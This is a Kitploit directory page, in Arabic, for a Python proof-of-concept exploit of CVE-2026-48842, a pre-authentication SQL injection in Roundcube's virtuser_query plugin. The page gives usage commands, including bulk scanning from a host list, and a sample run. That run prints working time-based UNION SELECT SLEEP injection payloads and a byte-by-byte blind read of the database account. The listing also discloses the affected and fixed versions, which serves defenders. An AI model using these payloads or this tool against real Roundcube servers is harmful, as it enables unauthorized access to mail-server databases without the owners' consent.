Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48842 — إثبات مفهوم بلغة Python للثغرة CVE-2026-48842، وهي حقن SQL قبل المصادقة في إضافة virtuser_query الخاصة بـ Roundcube. يؤكد وجود الخلل عبر الفرق الزمني ويقرأ حساب قاعدة البيانات قراءةً عمياء. | Kitploit
أدوات/GitHubGitHub/4minx/cve-2026-48842
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن قواعد البيانات
GitHub4minx/cve-2026-48842

CVE-2026-48842

إثبات مفهوم بلغة Python للثغرة CVE-2026-48842، وهي حقن SQL قبل المصادقة في إضافة virtuser_query الخاصة بـ Roundcube. يؤكد وجود الخلل عبر الفرق الزمني ويقرأ حساب قاعدة البيانات قراءةً عمياء.

عرض المستودع
منذ 6س 50دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-48842 PoC — حقن SQL قبل المصادقة في virtuser_query الخاص بـ Roundcube

إثبات مفهوم (PoC) لـ CVE-2026-48842، وهو حقن SQL قبل المصادقة في إضافة virtuser_query الاختيارية في Roundcube Webmail.

تقوم الأداة بشيئين وترفض التخمين في أيٍّ منهما:

  1. تؤكد الحقن عبر فرق صحيح/خطأ (وليس عبر sleep واحد).
  2. تثبت التأثير بقراءة حساب قاعدة البيانات من الهدف باستخدام --dumpdbuser.

تطبع الأداة استعلام SQL الدقيق الذي ينتجه كل فحص، لذا لا تُقدَّم نتيجة فاشلة أو غير حاسمة أبدًا كأنها اكتشاف.


معلومات الثغرة

CVECVE-2026-48842
النوعCWE-89 — حقن SQL
المكوّنplugins/virtuser_query/virtuser_query.php (غير مُفعَّل افتراضيًا)
المتأثرRoundcube 1.6.x < 1.6.16، 1.7.x < 1.7.1
المُصلَح1.6.16، 1.7.1

المتطلبات

  • Python 3.9+
  • requests
root@kitploit:~
pip install requests

الاستخدام

هدف واحد، الكشف فقط

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld

هدف واحد، إثبات التأثير بقراءة حساب قاعدة البيانات

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld --dumpdbuser

أوراكل أسرع (قد يحتاج مضيف مزدحم إلى ضبط)

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld -d 3 --dumpdbuser

أهداف متعددة

root@kitploit:~
python cve_2026_48842_poc.py --list hosts.txt
python cve_2026_48842_poc.py --list hosts.txt -d 3

الخيارات

المعاملالوصفالافتراضي
targetعنوان URL الأساسي لـ Roundcube، مثل https://mail.example.tld أو http://host/roundcube—
-l, --list FILEملف يحتوي على عنوان URL واحد لكل سطر. # يبدأ تعليقًا.—
-d, --delay Nثواني SLEEP لكل فحص أوراكل7
--dumpdbuserقراءة عمياء لـ CURRENT_USER() بعد تأكيد الحقنمعطّل
-h, --helpعرض المساعدة—

مثال على المخرجات

تشغيل حقيقي ضد Roundcube 1.6.15 محلي:

root@kitploit:~
[*] http://127.0.0.1/roundcube
    version=1.6.15  noise_floor=0.071s  _token=yes

[1] detection  injected=True  delta(true-false)=6.026s  delta(true-baseline)=6.015s  threshold=1.8s
    baseline                0.083s  http=401  sql_error=None
        _user=poc_baseline_user_9f2a
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='poc_baseline_user_9f2a'
    artifact_unterminated    0.09s  http=401  sql_error=None
        _user=a%5C
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='a\'
    injected_true           6.098s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D1%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=1,SLEEP(3),0)-- -'
    injected_false          0.072s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D2%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=2,SLEEP(3),0)-- -'

[2] blind read of the database account (~42s per byte, no quotes used)
    subquery: SELECT CURRENT_USER()
    length=14 bytes
    [  1/14] 'r'      [  2/14] 'ro'     [  3/14] 'roo'    [  4/14] 'root'
    [  5/14] 'root@'  [  6/14] 'root@l'  [  7/14] 'root@lo' [  8/14] 'root@loc'
    [  9/14] 'root@loca'  [ 10/14] 'root@local'  [ 11/14] 'root@localh'
    [ 12/14] 'root@localho' [ 13/14] 'root@localhos' [ 14/14] 'root@localhost'

[+] database account = 'root@localhost'

☕ الدعم

إذا ساعدك هذا المشروع، فكّر في دعم تطويره:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

المراجع

  • استشارة أمان Roundcube 2026-05-24 — https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
  • إيداع الإصلاح (1.6.x) — https://github.com/roundcube/roundcubemail/commit/3406183a9976e36f992d3468f37d0e2346526ee9
  • إيداع الإصلاح (1.7.x) — https://github.com/roundcube/roundcubemail/commit/87124cc7136a48b5fa9d2b40dfead6e9dcaeaf4b
  • NVD — https://nvd.nist.gov/vuln/detail/CVE-2026-48842
تنزيل الأداة